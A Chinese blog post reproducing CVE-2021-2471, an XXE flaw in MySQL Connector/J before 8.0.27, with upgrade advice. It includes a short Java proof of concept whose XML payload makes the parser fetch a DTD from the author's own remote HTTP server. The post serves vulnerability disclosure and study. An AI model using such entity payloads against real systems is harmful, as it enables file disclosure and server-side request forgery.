CVE-2021-2471 Mysql JDBC XXE

最新推荐文章于 2025-02-19 15:34:22 发布
最新推荐文章于 2025-02-19 15:34:22 发布
阅读量6.1k 收藏 3
点赞数
文章标签: mysql java 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42345596/article/details/121020807
版权
本文详细介绍了MySQL JDBC驱动在8.0.27之前的版本中存在XML External Entity (XXE)漏洞,该漏洞源于getSource()方法未对XML数据进行校验,允许攻击者通过构造恶意XML数据触发XXE攻击。复现环境和POC代码被提供,并展示了如何利用此漏洞。官方已发布修复版本,建议升级到安全版本以避免风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞简介

这个漏洞是由于 MySQL JDBC 8.0.27 版本之前,存在 getSource ()方法未对传入的 XML 数据做校验,导致攻击者可以在 XML 数据中引入外部实体,造成 XXE 攻击。

影响版本

MySQL Connector/J 8.0.27 之前

漏洞复现

这里采用的复现环境链接为: https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe

可以看到是mysql-connector-java 8.0.26的版本;

image-20211028164231816

下载mysql-connector-java8.0.26的jar包并导入,下载链接:https://downloads.mysql.com/archives/c-j/

image-20211028165029944

导入过程就不写了。。。

定位到处理XML格式的类com.mysql.cj.jdbc.MysqlSQLXML;

搜索getSource方法,可以看见当执行getSource()方法时,如果输入参数为DOMSource.class时,DocumentBuilder会直接newInstance实例化对象,stringRep会被带入并完成XML解析,没有进行校验和判断,从而导致出现XXE漏洞。

image-20211028165533065

创建数据库test、表tb_test、字段message并插入数据,这里ip是我远程开启http服务的机子,代码中getSQLXML(java.lang.String)方法是用于查询表中字段为message的值,将返回的消息字段通过SQLXML解析为org.h2.jdbc.JdbcSQLXML类的对象:

连接数据库

image-20211028174010565

image-20211028173359163

image-20211028174743305

开启http服务

image-20211028174126543

运行该poc

image-20211028174303915

收到了http请求

这里也可以不使用该复现环境,新建项目文件,导入jar包后,直接写入下面的poc,运行。

代码中setString是MysqlSQLXML继承的SQLXML类中的方法,用于对stringRep变量进行赋值从而被带入DocumentBuilder的实例化对象完成XML解析。

package mysqlxxetest;
import java.sql.SQLException;
import javax.xml.transform.dom.DOMSource;
import com.mysql.cj.jdbc.MysqlSQLXML;
public class test {
	public static void main(String[] args) throws SQLException {
        MysqlSQLXML myXML = new MysqlSQLXML(null);
        myXML.setString("<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://192.168.190.130:80/xxe.dtd\"> %xxe;]>");
        myXML.getSource(DOMSource.class);
    }
}

可以看见也收到了请求

参考链接:https://github.com/h2database/h2database/issues/3195

https://pyn3rd.github.io/2021/10/22/mysql-jdbc-xxe/

修复方法

官方已发布漏洞补丁及修复版本,升级至安全版本。

qyshskx
关注
MySQL Connectors组件8.0.12及之前版本的Connector/J子组件存在安全漏洞及其相关性分析
gg1229505432的博客
02-13 5777
MySQL Connectors组件8.0.12及之前版本的Connector/J子组件存在安全漏洞及其相关性分析
SQL JDBC XXE漏洞复现-CVE-2021-2471
Armandhe的博客
10-22 4079
MySQL JDBC XXE漏洞复现-CVE-2021-2471
CVE-2021-2471漏洞分析资料
xillianpeng的专栏
05-06 414
参考资料。
oracle访问mysql jdbc_Oracle Mysqljdbc连接
weixin_33281416的博客
01-28 158
Oracle和MySqljdbc或连接池中的连接,写下来以便随时参考Oracle:driverClassName=oracle.jdbc.driver.OracleDriverurl=jdbc:oracle:thin:@127.0.0.1:1521:orclusername=hrpassword=ystMySql:driverClassName=org.gjt.mm.mysql.Driverur...
Oracle MySQL 本地MySQL服务器安全漏洞
weixin_30732825的博客
04-18 508
漏洞名称: Oracle MySQL 本地MySQL服务器安全漏洞 CNNVD编号: CNNVD-201304-237 发布时间: 2013-04-17 更新时间: 2013-04-17 危害等级: 漏洞类型: 威胁类型: 本地 CVE编号: CVE-2013-239...
jdbc连接方式(Oracle和mySql
liuzejin813的专栏
03-27 525
<br />mySqlClass.forName("com.mysql.jdbc.Driver"); String url = "jdbc:mysql://localhost:3306:test"; Connection conn = DriverManager.getConnection(url, "root", "root"); }jdbc具体代码:public class DBUtil { //String sDBDriver = "oracle.jdbc.driver.Oracl
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1088
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
BUUCTF REAL
A_dmin的博客
01-30 4532
BUUCTF REAL flag好像都在系统环境变量中,phpinfo中就能看见,,,, [PHP]XXE libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 payload: <?xml version="1.0" encoding="utf-...
JavaVersion+】因mysql-connector-java版本升级,引发的问题
诸葛小二的博客
08-16 1088
mysql版本升级,引发的问题
mysqljdbc防止注入占位符_oracle迁移改造成mysql遇到的那些坑--占位符引起的mysql-jdbc驱动包中表名映射出现错误...
weixin_35552251的博客
01-28 176
近期项目组要把oracle数据库迁移改造成mysql数据库,同时也涉及到了后台java代码的改造,因此在迁移过程中遇到了各种坑。今天讲述一个java代码开发过程中,因为mysql-jdbc驱动包中DatabaseMetaDataUsingInfoSchema类的某个方法导致的表名映射错误。表命名时常常会使用下划线来分隔,比如普通表名以t_开头,表示为table,命名规则为t_模块名(或有意义的简写...
oracle服务漏洞,Oracle发布关于MySQL服务的重大安全漏洞说明
weixin_29123181的博客
04-11 834
今天小凯seo博客转载一篇来自百度安全指数平台在2018年1月18日发布的关于MySQL重大安全漏洞通告的内容,正文部分如下:Oracle 官方近日发布安全公告,公告修复 MySQL25 个安全漏洞,在这些安全漏洞中,影响较大的 CVE-2018-2696 漏洞可以在无需认证的条件下,远程利用导致拒绝服务攻击。本次安全公告披露的安全漏洞数量较多,建议用户关注。漏洞编号: CVE-2018-2696...
XXE漏洞笔记
公众号shadow sock7
06-30 2992
参考: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-059911.html http://bobao.360.cn/learning/detail/3841.html http://blog.youkuaiyun.com/u011721501/article/details/43775691 http://thief.one/2017/06/20/1
oracle盲注获取字段,Oracle盲注结合XXE漏洞远程获取数据 | CN-SEC 中文网
weixin_42351606的博客
04-03 193
摘要想必大家对SQL注入已经耳熟能详,对XML实体注入(简称XXE)也有所了解。本文主要讨论了一种在存在ORACLE盲注的情况下远程获取数据的方式。其实和UTL_HTTP远程获取的方法差不多,只不过原理不同。想必大家对SQL注入已经耳熟能详,对XML实体注入(简称XXE)也有所了解。本文主要讨论了一种在存在ORACLE盲注的情况下远程获取数据的方式。其实和UTL_HTTP远程获取的方法差不多,只不...
【漏洞复现】CVE-2004-2761:使用弱哈希算法签名的 SSL 证书(SSL Certificate Signed Using Weak Hashing Algorithm)
热门推荐
qq_43455906的博客
08-07 2万+
本次复现是针对编号为CVE-2004-2761的漏洞,由于条件有限,本次复现通过创建自签名证书进行操作。解决证书链中的 SSL 证书使用弱哈希算法进行签名的问题。
Oracle与MysqlJDBC连接代码+Oracle与JDK的对应关系(Java代码)
qq_14945327的博客
06-20 349
Oracle与MysqlJDBC连接代码+Oracle与JDK的对应关系
【2025版】最新防范XXE漏洞:XXE攻击详解与应对策略,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
02-19 1180
在当今网络安全形势日益严峻的环境中,XXE(XML External Entity)漏洞作为一种常见的XML解析安全问题,得到了越来越多的关注。首先,XXE漏洞利用了XML解析器在处理外部实体时的安全缺陷,攻击者可以通过精心构造的XML文档,读取系统内部敏感文件、执行任意命令,甚至进行内部网络探测。一旦系统遭到攻击,可能导致数据泄露、服务中断甚至更为严重的后果,因此,了解并防范XXE漏洞非常重要。针对这一漏洞,禁用DTD及外部实体的解析是最直接且有效的方式。
漏洞扫描处理:凝思6.0.80操作系统安装数据库Mysql 8.0.27(二进制安装包安装)
weixin_43159900的博客
01-20 6835
漏洞扫描处理:凝思6.0.80操作系统安装数据库Mysql 8.0.27(二进制安装包安装)
CVE-2021-35042 Django SQL注入漏洞复现
weixin_42345596的博客
08-03 2316
CVE-2021-35042 Django SQL注入漏洞复现 漏洞描述 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。 组件介绍 Django是一个开放源代码的Web应用框架,由Python写成。采用了MVC的框架模式,即模型M,视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值